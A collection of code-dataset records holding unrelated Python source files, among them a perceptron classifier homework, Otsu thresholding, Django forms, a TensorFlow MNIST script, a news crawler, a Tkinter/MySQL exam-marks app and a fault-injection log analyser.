+{"seq_id":"281852764","text":"import sys, string, math\nimport operator\n\nlist_stopwords = list()\ndict_features = dict()\nlist_words_in_line = list()\ntranslator = str.maketrans('', '', string.punctuation)\nb = 0\n\n#read stopwords file\ndef readStopWords():\n fhand = open('stopwords.txt',encoding=\"utf8\")\n for line in fhand:\n list_stopwords.append(line.rstrip('\\n'))\n\nreadStopWords()\n\n#read file\ndef removeLowFrequencyWords():\n dict_total_words = dict()\n fhand = open(sys.argv[1],encoding=\"utf8\")\n for line in fhand:\n temp = dict()\n words = line.split()\n for i in range(3,len(words)):\n word = words[i].lower().translate(translator).strip()\n if not word == \"\":\n if word.isalpha():\n if not word in list_stopwords:\n if word in dict_total_words:\n dict_total_words[word] += 1\n else:\n dict_total_words[word] = 1\n count_of_words = math.ceil(len(dict_total_words)*0.1)\n newA = dict(sorted(dict_total_words.items(), key=operator.itemgetter(1), reverse=False)[:count_of_words])\n list_stopwords.extend(list(newA))\n newB = dict(sorted(dict_total_words.items(), key=operator.itemgetter(1), reverse=True)[:50])\n list_stopwords.extend(list(newB))\n\nremoveLowFrequencyWords()\n\n\n#read training data\ndef readTrainingData():\n fhand = open(sys.argv[1],encoding=\"utf8\")\n for line in fhand:\n temp = dict()\n words = line.split()\n for i in range(3,len(words)):\n word = words[i].lower().translate(translator).strip()\n if not word == \"\":\n if word.isalpha():\n if not word in list_stopwords:\n if word in temp:\n temp[word] += 1\n else:\n temp[word] = 1\n if not word in dict_features:\n dict_features[word] = 0\n if words[1] == \"Fake\":\n temp['cls1'] = -1\n else:\n temp['cls1'] = 1\n if words[2] == 'Pos':\n temp['cls2'] = 1\n else:\n temp['cls2'] = -1\n list_words_in_line.append(temp)\n\nreadTrainingData()\n\n#train vanilla model\ndef trainCLass(className):\n global b\n for i in range(0,29):\n for words_in_line in list_words_in_line:\n y = words_in_line[className]\n a = 0\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n a += (words_in_line[word] * dict_features[word])\n if (y*a) <= 0:\n #update weights and bias\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n dict_features[word] = dict_features[word] + (y*words_in_line[word])\n b += y\n\ndef resetFeatures():\n global b\n b = 0\n #reset all weights to 0\n for word in dict_features:\n dict_features[word] = 0\n\n#write model to file\ndef writeModel(fdict,mode,fileName):\n f = open(fileName,mode,encoding=\"utf8\")\n f.write(str(b)+'\\n')\n f.write(str(fdict)+'\\n')\n f.close()\n\ntrainCLass('cls1')\nwriteModel(dict_features,\"w\",\"vanillamodel.txt\")\nresetFeatures()\ntrainCLass('cls2')\nwriteModel(dict_features,\"a+\",\"vanillamodel.txt\")\nresetFeatures()\n\n\n#train average model data\ndef trainAvgModel(className):\n dict_cached_features = dict_features.copy()\n beta = 0\n c = 1\n global b\n for i in range(0,29):\n for words_in_line in list_words_in_line:\n y = words_in_line[className]\n a = 0\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n a += (words_in_line[word] * dict_features[word])\n if (y*a) <= 0:\n #update weights and bias\n for word in words_in_line:\n if not (word == 'cls1' or word == 'cls2'):\n dict_features[word] += (y*words_in_line[word])\n dict_cached_features[word] += (y*c*words_in_line[word])\n b += y\n beta += (y*c)\n c += 1\n b -= (beta/c)\n for word in dict_features:\n dict_features[word] -= (dict_cached_features[word]/c)\n\ntrainAvgModel('cls1')\nwriteModel(dict_features,\"w\",\"averagedmodel.txt\")\nresetFeatures()\ntrainAvgModel('cls2')\nwriteModel(dict_features,\"a+\",\"averagedmodel.txt\")\n\nprint(len(dict_features))\n","sub_path":"Coding Homework/Homework3/perceplearn3.py","file_name":"perceplearn3.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395832186","text":"import numpy as np\r\n#\r\n# NO MORE MODULES ALLOWED\r\n#\r\n\r\n#input - \t[2-D image]\r\n#output - \t[2-D image]\r\n#Implement Otsus thresholding\r\ndef otsu(image):\r\n histogram = np.histogram(image, bins=256,range = [0,256])[0]\r\n npixels = image.shape[0]*image.shape[1] + 0.0\r\n p0 = 0.0\r\n m0 = 0.0\r\n wtotal = 0.0\r\n for i in range(0, 256):\r\n wtotal = wtotal + i * (histogram[i].item()/npixels)\r\n maximum = (0, -1)\r\n for i in range(0, 256):\r\n p0 = p0 + histogram[i].item()/npixels\r\n p1 = 1 - p0\r\n if p0 == 0 or p1 == 0:\r\n continue\r\n m0 = m0 + i * (histogram[i].item()/npixels)\r\n m1 = wtotal - m0\r\n sigma = p0*p1*(((m1/p1)-(m0/p0))**2)\r\n\r\n if sigma > maximum[0]:\r\n maximum = (sigma, i)\r\n\r\n nimg = image.copy()\r\n for r in range(0, len(image)):\r\n for v in range(0, len(image[0])):\r\n if image[r][v] > maximum[1]:\r\n nimg[r][v] = 255\r\n else:\r\n nimg[r][v] = 0\r\n\r\n return nimg\r\n\r\n","sub_path":"Task_3/Task3/Otsus.py","file_name":"Otsus.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"168682610","text":"#!/usr/bin/env python\n\n# Setup the ALICE Yale Dev utils package\n\n# Derived from the setup.py in aliBuild\n# and based on: https://python-packaging.readthedocs.io/en/latest/index.html\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n# To use a consistent encoding\nfrom codecs import open\nfrom os import path\n\n# Get the long description from the README file\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name=\"alice_yale_dev_utils\",\n version=\"0.5\",\n\n description=\"ALICE Yale Dev Utils: Python utilities for analysis\",\n long_description=long_description,\n\n author=\"Raymond Ehlers\",\n author_email=\"raymond.ehlers@cern.ch\",\n\n url=\"https://gitlab.cern.ch/ALICEYale/alice-yale-dev\",\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n # How mature is this project? Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 4 - Beta',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 2.7'\n ],\n\n # What does your project relate to?\n keywords='ALICE',\n\n packages=[\n \"aliceYaleDevUtils\"\n ],\n\n install_requires=[\n \"colorama\"\n ],\n\n # Include additional files\n include_package_data=True,\n\n setup_requires=[\n \"pytest-runner\"\n ],\n\n tests_require=[\n \"pytest\"\n ]\n )\n","sub_path":"analyses/utilities/aliceYaleDevUtils/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"209243228","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom game.round.models import Plot\nfrom .models import Survey, Settings\n\n\nclass RoundForm(forms.Form):\n guess = forms.DecimalField(required=True, max_digits=3, decimal_places=2)\n\n\nclass ExitSurvey(forms.ModelForm):\n class Meta:\n model = Survey\n fields = ['gender', 'age', 'feedback']\n\n def __init__(self, *args, **kwargs):\n super(ExitSurvey, self).__init__(*args, **kwargs)\n for f in ['gender', 'age', 'feedback']:\n self.fields[f].required = False\n\n\nclass SettingsForm(forms.ModelForm):\n class Meta:\n model = Settings\n fields = ['max_users', 'min_users', 'score_lambda', 'max_following', 'min_following', 'max_rounds']\n\n def clean(self):\n cleaned_data = self.cleaned_data\n if cleaned_data.get('max_users', 0) > cleaned_data.get('max_following', 0) > \\\n cleaned_data.get('min_following', 0) and cleaned_data.get('max_users', 0) > \\\n cleaned_data.get('min_users', 0) and cleaned_data.get('score_lambda', 1) and \\\n Plot.objects.all().count() >= cleaned_data.get('max_rounds') > 0:\n return cleaned_data\n\n raise ValidationError(\"Didn't meet logical constraints for the Settings model\")\n\n\nclass CheckForm(forms.Form):\n Q1_choices = (('1', 'Estimate the correlation of two variables'),\n ('2', 'Count the points in the picture'),\n )\n q1 = forms.ChoiceField(label='Your goal in the game is to', widget=forms.RadioSelect(attrs={'class': 'form-group'}),\n choices=Q1_choices)\n\n q2 = forms.DecimalField(label='The maximum correlation possible is', widget=forms.TextInput)\n\n q4 = forms.ChoiceField(label='In this game, all correlations will be', widget=forms.RadioSelect,\n choices=(('1', 'Negative or positive'),\n ('2', 'Only positive'),\n ))\n\n q5 = forms.ChoiceField(label='You will get a chance to change your estimate after your initial guess.',\n widget=forms.RadioSelect, choices=(('1', 'True'),\n ('2', 'False'),\n ))\n\n q6 = forms.ChoiceField(label='Have you participated in this study before?', widget=forms.RadioSelect,\n choices=(('1', 'No'),\n ('2', 'Yes'),\n ))\n\n def clean(self):\n cleaned_data = super(CheckForm, self).clean()\n q1 = cleaned_data.get('q1')\n q2 = float(cleaned_data.get('q2'))\n q4 = cleaned_data.get('q4')\n q5 = cleaned_data.get('q5')\n q6 = cleaned_data.get('q6')\n\n if q1 == '1' and q2 == 1 and q4 == '2' and q5 == '1' and q6 == '1':\n return cleaned_data\n raise forms.ValidationError('Some answers are wrong .. please go back and read the instructions carefully')\n","sub_path":"game/interactive/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"105281754","text":"from helper import *\n\nIMAGE_SIZE = 28 * 28\nCATEGORY_NUM = 10\nLEARNING_RATE = 0.1\nTRAINING_LOOP = 20000\nBATCH_SIZE = 100\nSUMMARY_DIR = 'log_softmax'\nSUMMARY_INTERVAL = 100\n\nmnist = input_data.read_data_sets('data', one_hot=True)\n\nwith tf.Graph().as_default():\n with tf.name_scope('input'):\n y_ = tf.placeholder(tf.float32, [None, CATEGORY_NUM], name='labels')\n x = tf.placeholder(tf.float32, [None, IMAGE_SIZE], name='input_images')\n\n with tf.name_scope('readout'):\n W = weight_variable([IMAGE_SIZE, CATEGORY_NUM], name='weight')\n b = bias_variable([CATEGORY_NUM], name='bias')\n y = tf.nn.softmax(tf.matmul(x, W) + b)\n\n with tf.name_scope('optimize'):\n cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))\n train_step = tf.train.GradientDescentOptimizer(LEARNING_RATE).minimize(cross_entropy)\n cross_entropy_summary = tf.scalar_summary('cross entropy', cross_entropy)\n\n with tf.Session() as sess:\n train_writer = tf.train.SummaryWriter(SUMMARY_DIR + '/train', sess.graph)\n test_writer = tf.train.SummaryWriter(SUMMARY_DIR + '/test', sess.graph)\n\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n train_accuracy_summary = tf.scalar_summary('accuracy', accuracy)\n test_accuracy_summary = tf.scalar_summary('accuracy', accuracy)\n\n sess.run(tf.initialize_all_variables())\n for i in range(TRAINING_LOOP + 1):\n batch = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_step, {x: batch[0], y_: batch[1]})\n\n if i % SUMMARY_INTERVAL == 0:\n print('step %d' % i)\n summary = sess.run(tf.merge_summary([cross_entropy_summary, train_accuracy_summary]), {x: batch[0], y_: batch[1]})\n train_writer.add_summary(summary, i)\n summary = sess.run(tf.merge_summary([test_accuracy_summary]), {x: mnist.test.images, y_: mnist.test.labels})\n test_writer.add_summary(summary, i)\n","sub_path":"src/tensorflow/mnist_softmax.py","file_name":"mnist_softmax.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"354844133","text":"from model.models import Articles\nfrom parsers import get_parser\nfrom parsers import parsers\nfrom util import logger\nimport urllib.request\nimport traceback\n\nlog = logger.get(__name__)\n\n\ndef canonicalize_url(url):\n return url.split('?')[0].split('#')[0].strip()\n\n\ndef get_all_new_article_urls():\n ans = set()\n for parser in parsers:\n log.info('Looking up %s' % parser.domains)\n urls = parser.feed_urls()\n ans = ans.union(map(canonicalize_url, urls))\n log.debug('Got %s urls so far' % len(ans))\n return ans\n\n\ndef get_existing_urls(articles):\n return articles.get_all_urls_older_than(20)\n\n\ndef get_all_article_urls(articles):\n return get_all_new_article_urls().union(get_existing_urls(articles))\n\n\ndef load_article(url):\n try:\n parser = get_parser(url)\n except KeyError:\n log.info('Unable to parse domain, skipping')\n return\n try:\n parsed_article = parser(url)\n except (AttributeError, urllib.request.HTTPError, Exception) as e:\n if isinstance(e, urllib.request.HTTPError) and e.msg == 'Gone':\n return\n log.error('Exception when parsing %s', url)\n log.error(traceback.format_exc())\n log.error('Continuing')\n return\n if not parsed_article.real_article:\n return\n return parsed_article\n\n\ndef update_articles():\n articles = Articles()\n all_urls = get_all_article_urls(articles)\n log.info('Got all %s urls; storing to database' % len(all_urls))\n for i, url in enumerate(all_urls):\n log.debug('Woo: %d/%d is %s' % (i + 1, len(all_urls), url))\n parsed_article = load_article(url)\n if parsed_article is None:\n continue\n articles.save_entry(parsed_article, url)\n\n\ndef main():\n update_articles()\n pass\n\n\nif __name__ == '__main__':\n main()","sub_path":"crawler/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"514069705","text":"from .. import *\n\nDEBUG = False\nCOMPRESS_ENABLED = True\n\nDATABASES = {\n 'default': {\n # Choose between PostgreSQL or MySQL:\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n #'ENGINE': 'django.db.backends.mysql',\n 'NAME': '{{ project_name }}',\n 'USER': '{{ project_name }}',\n 'PASSWORD': '',\n },\n}\n\nINSTALLED_APPS += (\n #'gunicorn',\n)\n\nTEMPLATES[0]['OPTIONS']['loaders'] = (\n ('django.template.loaders.cached.Loader', TEMPLATES[0]['OPTIONS']['loaders']),\n)\n\nALLOWED_HOSTS = (\n '{{ project_name }}.testing.mycompany.tld',\n)\n\nCACHES['default']['KEY_PREFIX'] = '{{ project_name }}.beta'\n","sub_path":"project_name/settings/env/beta.py","file_name":"beta.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"505918932","text":"# ab 是 address book 地址簿缩写\nab = {\n \"zhanghzenyang\": \"zhenyang0510@163.com\",\n \"liyuepeng\": \"yuepeng@163.com\",\n \"gaobing\": \"gaobing@163.com\"\n}\nprint(\"zhengyang's address is\", ab[\"zhanghzenyang\"])\n# 删除一条记录\ndel ab[\"zhanghzenyang\"]\nprint('There are {} contracts in the address-book\\n'.format(len(ab)))\nfor name, address in ab.items():\n print('Contact {} at {}'.format(name, address))\n# 新增一条记录\nab['lengjiang'] = 'lejiang@163.com'\nif 'lengjiang'in ab:\n print('\\nlengjiang\\'address is',ab['lengjiang'])\n\n","sub_path":"ds_using_dict.py","file_name":"ds_using_dict.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"580177444","text":"#for GUI\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n#connecting with MySQL_database to store details.\r\nimport mysql.connector as sql\r\nmycon=sql.connect(host=\"localhost\",user=\"root\",passwd=\"sanju123\",database=\"Exam_Analysis\")\r\ncursor=mycon.cursor()\r\n\r\n#importing entermarks.py file to add all the marks to the database.\r\nfrom entermarks import *\r\n\r\n#showing graphs for analysing their performance\r\nimport matplotlib.pyplot as plt\r\n\r\n#student reg form(handled by teachers)\r\ndef Sregistration_form():\r\n\r\n #window config.\r\n windowR=Tk()\r\n windowR.geometry(\"550x500\")\r\n windowR.config(bg=\"light yellow\")\r\n windowR.title(\"Registration form\")\r\n\r\n #head label\r\n label_0=Label(windowR,text=\"REGISTRATION FORM\",fg=\"black\",bg=\"light yellow\",relief=\"solid\",font=(\"Copperplate Gothic\",17,\"bold\"))\r\n label_0.place(x=120,y=35)\r\n \r\n #adm label\r\n label_1=Label(windowR,text=\"Adm No:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_1.place(x=40,y=120)\r\n entry_1=Entry(windowR,font=(\"Constantia\",18))\r\n entry_1.place(x=140,y=120)\r\n\r\n #name label\r\n label_2=Label(windowR,text=\"Name:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_2.place(x=40,y=170)\r\n entry_2=Entry(windowR,font=(\"Constantia\",18))\r\n entry_2.place(x=140,y=170)\r\n\r\n #class ans sec label\r\n label_3=Label(windowR,text=\"Class&Sec:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_3.place(x=40,y=220)\r\n entry_3=Entry(windowR,font=(\"Constantia\",18))\r\n entry_3.place(x=140,y=220)\r\n\r\n #ph no label\r\n label_4=Label(windowR,text=\"Ph no:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_4.place(x=40,y=270)\r\n entry_4=Entry(windowR,font=(\"Constantia\",18))\r\n entry_4.place(x=140,y=270)\r\n\r\n #e mail label\r\n label_5=Label(windowR,text=\"E mail:\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_5.place(x=40,y=320)\r\n entry_5=Entry(windowR,font=(\"Constantia\",18))\r\n entry_5.place(x=140,y=320)\r\n\r\n #submit command\r\n def reg_submit():\r\n adm=entry_1.get()\r\n name = entry_2.get()\r\n cs=entry_3.get()\r\n phn = entry_4.get()\r\n email = entry_5.get()\r\n pwd=\"123\"\r\n user_id = name[0:3]+adm+\"@student.com\"\r\n\r\n query = \"insert into studentt(name,adm_no,class_sec,ph_no,e_mail,user_id,pwd) values (%s,%s,%s,%s,%s,%s,%s)\"\r\n val = (name,adm,cs,phn,email,user_id,pwd)\r\n cursor.execute(query,val)\r\n mycon.commit()\r\n \r\n label_6=Label(windowR,text=\"Success!\",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_6.place(x=220,y=400)\r\n\r\n label_7=Label(windowR,text=\"Use \"+user_id+\" and \"+pwd+\" to log in \",fg=\"black\",bg=\"light yellow\",font=(\"Constantia\",15))\r\n label_7.place(x=100,y=450)\r\n\r\n #registration submit button\r\n sub_find=Button(windowR,text=\"SUBMIT\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=reg_submit)\r\n sub_find.place(x=120,y=400)\r\n\r\n#find studs command\r\ndef findAll_studs(a):\r\n query = \"select name,adm_no from studentt where class_sec=%s\"\r\n cursor.execute(query,(a,))\r\n detLi=[]\r\n for i in cursor:\r\n li=list(i)\r\n DET=\"Name : \"+str(li[0])+\" Adm. no. \"+str(li[1])\r\n detLi.append(DET)\r\n\r\n #new window to diplay the student list.\r\n windowList = Tk()\r\n windowList.geometry(\"400x300\")\r\n windowList.title(\"Exam Analysis\")\r\n windowList.configure(bg=\"pink\")\r\n \r\n eve_list=Listbox(windowList,height=8,width=20, font=(\"Verdana\",17))\r\n for i in range(len(detLi)):\r\n eve_list.insert(i,detLi[i])\r\n eve_list.place(x=20,y=10)\r\n\r\ndef checkreport(a):\r\n query = \"select math_q,sci_q,eng_q,soc_q,math_h,sci_h,eng_h,soc_h,math_a,sci_a,eng_a,soc_a from studentt where adm_no=%s\"\r\n val = (a,)\r\n mark_list=[]\r\n cursor.execute(query,val)\r\n for i in cursor:\r\n for j in i:\r\n mark_list.append(j)\r\n exams = ['Quarterly avg', 'Half yearly avg', 'Annual avg']\r\n #finding average\r\n if mark_list!=[]:\r\n q = (mark_list[0]+mark_list[1]+mark_list[2]+mark_list[3])/4\r\n h = (mark_list[4]+mark_list[5]+mark_list[6]+mark_list[7])/4\r\n a = (mark_list[8]+mark_list[9]+mark_list[10]+mark_list[11])/4\r\n values = [q, h, a]\r\n\r\n plt.figure(figsize=(5, 5))\r\n plt.ylabel('Marks')\r\n plt.xlabel('Examinations')\r\n plt.plot(exams, values)\r\n plt.suptitle('Exam Performance Analysis')\r\n plt.show()\r\n else:\r\n messagebox.showinfo(\"Student does not exist.\")\r\n\r\ndef homepageT():\r\n \r\n windowT=Tk()\r\n windowT.geometry(\"1000x700\")\r\n windowT.title(\"Exam Analysis\")\r\n windowT.configure(bg=\"pink\")\r\n\r\n #school logo\r\n logo=PhotoImage(master=windowT,file=\"SV-logo.png\")\r\n label_p1=Label(windowT, image=logo)\r\n label_p1.place(x=20,y=10)\r\n\r\n #school name title\r\n schname_label=Label(windowT,text=\"SARASWATHI VIDYALAYA\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",27,\"bold\"))\r\n schname_label.place(x=250,y=20)\r\n\r\n #heading\r\n head_label=Label(windowT,text=\"Examination Marks & Performance Analysis\",bg=\"pink\",fg=\"brown\",font=(\"Constantia\",22,\"bold\"))\r\n head_label.place(x=210,y=90)\r\n\r\n #student_reg button\r\n button_studR=Button(windowT,text=\"Reg. Student\",fg='white',bg='light blue',relief=RIDGE,font=(\"Constantia\",17,\"bold\"),width=10,command=Sregistration_form)\r\n button_studR.place(x=40,y=200)\r\n\r\n #find students using class\r\n find_label=Label(windowT,text=\"Find stud's adm. no:\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",13))\r\n find_label.place(x=620,y=160)\r\n \r\n listC=['9A','10A','11A','12A','9B','10B','11B','12B']\r\n clas=StringVar()\r\n droplistC=OptionMenu(windowT,clas, *listC)\r\n clas.set(' ')\r\n droplistC.config(width=10,font=(\"Constantia\",16),fg=\"red\")\r\n droplistC.place(x=640,y=190)\r\n \r\n def send_find():\r\n classs=clas.get()\r\n findAll_studs(classs)\r\n\r\n #find studs using class button\r\n button_find=Button(windowT,text=\"Find\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=send_find)\r\n button_find.place(x=820,y=190)\r\n\r\n #check report label\r\n report_label=Label(windowT,text=\"Check Report:\",bg=\"pink\",fg=\"red\",font=(\"Constantia\",20,\"bold\"))\r\n report_label.place(x=210,y=270)\r\n\r\n #student's adm no. label\r\n studA_label=Label(windowT,text=\"Stud's Adm. No:\",bg=\"pink\",fg=\"black\",font=(\"Constantia\",18,\"bold\"))\r\n studA_label.place(x=240,y=350)\r\n adm_entry=Entry(windowT,width=15, font=(12))\r\n adm_entry.place(x=500,y=350)\r\n\r\n def submit():\r\n adm_no = adm_entry.get()\r\n checkreport(adm_no)\r\n\r\n #button to check their report using matplotlib.\r\n sub_find=Button(windowT,text=\"SUBMIT\",fg='white',bg='black',relief=RIDGE,font=(\"Constantia\",13),width=10,command=submit)\r\n sub_find.place(x=420,y=400)\r\n\r\n #add marks label\r\n add_label=Label(windowT,text=\"Add marks:\",bg=\"pink\",fg=\"red\",font=(\"Constantia\",20,\"bold\"))\r\n add_label.place(x=210,y=470)\r\n\r\n #exam type buttons(functions are their in the extramarks.py file)\r\n button_Q=Button(windowT,text=\"Quarterly\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=Quarterly)\r\n button_Q.place(x=250,y=540)\r\n\r\n button_H=Button(windowT,text=\"Half yrly\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=Halfyrly)\r\n button_H.place(x=500,y=540)\r\n\r\n button_A=Button(windowT,text=\"Annual\",fg='blue',bg='light yellow',relief=RIDGE,font=(\"Constantia\",14),width=10,command=annual)\r\n button_A.place(x=750,y=540)\r\n\r\n","sub_path":"teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"215108156","text":"#!/bin/python\nimport re, os, getopt, sys, pickle\n\nclass Injection:\n \"\"\"\n Stores information about a single fault injection\n \"\"\"\n def __init__(self, varName, varType, line, memContentBefore, newValue, faultModel, fileName, functionName, faultResult, sdcCriticality, time, decLine, decFile):\n self.varName = varName\n self.varType = varType\n self.line = line\n self.memContentBefore = memContentBefore\n self.newValue = newValue\n self.faultModel = faultModel\n self.fileName = fileName\n self.functionName = functionName\n self.faultResult = faultResult\n self.sdcCriticality = sdcCriticality # -1 = not evaluated, 0 = not critical, >0 = how critical\n self.time = time\n self.decLine = decLine\n self.decFile = decFile\n\n def __eq__(self, other):\n \"\"\"\n Return true if the variables are the same\n \"\"\"\n return self.varName == other.varName and self.decLine == other.decLine \\\n and self.decFile == other.decFile\n\n def __repr__(self):\n\n if self.varType.find(\"structure\") > -1 or self.varType.find(\"array\") > -1:\n # Doesn't print values for arrays or structs\n return \"faultResult: %s\\nvarName: %s\\nvarType: %s\\nline: %s\\nfaultModel: %s\\nfileName: %s\\nfunctionName: %s\\n\" %(self.faultResult, self.varName, self.varType, self.line, self.faultModel, self.fileName, self.functionName)\n else:\n return \"faultResult: %s\\nvarName: %s\\nvarType: %s\\nline: %s\\nmemCont: %s\\nnewValue: %s\\nfaultModel: %s\\nfileName: %s\\nfunctionName: %s\\n\" %(self.faultResult, self.varName, self.varType, self.line, self.memContentBefore, self.newValue, self.faultModel, self.fileName, self.functionName)\n\nclass Result:\n \"\"\"\n Stores information about all results from multiple fault injections\n \"\"\"\n def __init__(self, failedList, hangList, maskedList, sdcList):\n self.failedList = failedList\n self.hangList = hangList\n self.maskedList = maskedList\n self.sdcList = sdcList\n\n def __repr__(self):\n\n return \"--Result--\\n\\tFailed: %d\\n\\tHangs: %d\\n\\tMasked: %d\\n\\tSDCs: %d\\n\" %(len(self.failedList), len(self.hangList), len(self.maskedList), len(self.sdcList))\n\n#-------------------------------------------------------------------------------\ndef main(argv):\n\n logDir = \"/home/andre/ufrgs/ftf/initial_logs/collisionDetection-random/\"\n newLogs = False\n\n # Reading arguments from command line\n try:\n opts, args = getopt.getopt(argv, \"\", [\"help\", \"new\"])\n for opt, arg in opts:\n if opt == \"--new\":\n newLogs = True\n elif opt == \"--help\":\n print(\"Usage:\")\n print(\"\\t--new to read all log files from the directory listed in \\'logDir\\' variable.\")\n print(\"\\tNo argument to read values from previously written \\'result.pkl\\' file.\")\n sys.exit(1);\n except getopt.GetoptError:\n print(\"Problem with provided arguments\")\n sys.exit(0)\n\n if(newLogs):\n # Initialization\n failedList = list()\n hangList = list()\n maskedList = list()\n noOutputList = list()\n sdcList = list()\n\n # Searches all directories\n for fileName in os.listdir(logDir):\n # Skip regular files\n if not os.path.isdir(logDir + fileName):\n continue\n\n if fileName == \"failed-injection\":\n # Failed\n print(\"Reading failed injection logs...\")\n failedList = handleLogDir(failedList, logDir+\"failed-injection\", \"failed\")\n\n elif fileName == \"hangs\":\n # Hangs\n print(\"Reading hang injections logs...\")\n hangList = handleLogDir(hangList, logDir+\"hangs/\", \"hang\")\n\n elif fileName == \"masked\":\n # Masked\n print(\"Reading masked injections logs...\")\n maskedList = handleLogDir(maskedList, logDir+\"masked/\", \"masked\")\n\n elif fileName == \"noOutputGenerated\":\n # No output\n print(\"Reading noOutput injections logs...\")\n noOutputList = handleLogDir(noOutputList, logDir+\"noOutputGenerated/\", \"noOutputGenerated\")\n\n elif fileName == \"sdcs\":\n # SDCs\n print(\"Reading SDC injections logs...\")\n sdcList = handleLogDir(sdcList, logDir+\"sdcs/\", \"sdc\")\n\n # Create Result object\n result = Result(failedList, hangList, maskedList, sdcList)\n # Save variables with pickle\n pickle.dump(result, open(\"result.pkl\", \"wb\"))\n\n else:\n # Reads variables with pickle\n try:\n result = pickle.load(open(\"result.pkl\", \"rb\"))\n except:\n print(\"Couldn't read pickle values!\")\n sys.exit(0)\n\n # Print number of elements in each list\n print(result)\n # listSdcCriticality(result)\n listCriticalVariables(result)\n # listTimeVulnerability(result)\n\n#-------------------------------------------------------------------------------\ndef listSdcCriticality(result):\n \"\"\"\n List SDC cricitality\n \"\"\"\n sdcCriticalityFilePath = \"/home/andre/ufrgs/ftf/sdcCriticality.log\"\n listBuf = result.sdcList\n listBuf = sorted(listBuf, key=lambda x: x.sdcCriticality)\n listBuf.reverse()\n\n # Log file\n logFile = open(sdcCriticalityFilePath, \"w\")\n\n totalElements = 2819.0\n\n for percentageCount in range(2,101,2):\n elementCount = 0\n for item in listBuf:\n if (item.sdcCriticality > percentageCount-2) and (item.sdcCriticality <= percentageCount):\n elementCount += 1\n\n\n logFile.write(\"%d: %.2f\\n\" %(percentageCount, float(elementCount)/totalElements*100.0))\n logFile.close()\n\ndef listCriticalVariables(result):\n \"\"\"\n Lists number of ocurrances of each variable in each Result list\n Outputs results into listCriticalVariables.dat file\n \"\"\"\n\n sdcCritVarFilePath = \"/home/andre/ufrgs/ftf/sdcCriticalVariables.log\"\n hangCritVarFilePath = \"/home/andre/ufrgs/ftf/hangCriticalVariables.log\"\n sdcVarDic = dict()\n hangsVarDic = dict()\n\n # Creates dicts for variable ocurrances\n for varIndex, inj in enumerate(result.hangList):\n # For each injection\n varFound = False\n for index in hangsVarDic.keys():\n # Each index already stored in the counter list\n if(result.hangList[index] == inj):\n # The variables are the same\n hangsVarDic[index] += 1\n varFound = True\n\n if not varFound:\n # Variable hasn't been counted yet\n hangsVarDic[varIndex] = 1\n\n hangsVarDic = sorted(hangsVarDic.items(), key=lambda x: x[1])\n\n for varIndex, inj in enumerate(result.sdcList):\n # For each injection\n varFound = False\n for index in sdcVarDic.keys():\n # Each index already stored in the counter list\n if(result.sdcList[index] == inj):\n # The variables are the same\n sdcVarDic[index] += 1\n varFound = True\n\n if not varFound:\n # Variable hasn't been counted yet\n sdcVarDic[varIndex] = 1\n\n sdcVarDic = sorted(sdcVarDic.items(), key=lambda x: x[1])\n\n #Print lists into log file\n hangLogFile = open(hangCritVarFilePath, \"w\")\n sdcLogFile = open(sdcCritVarFilePath, 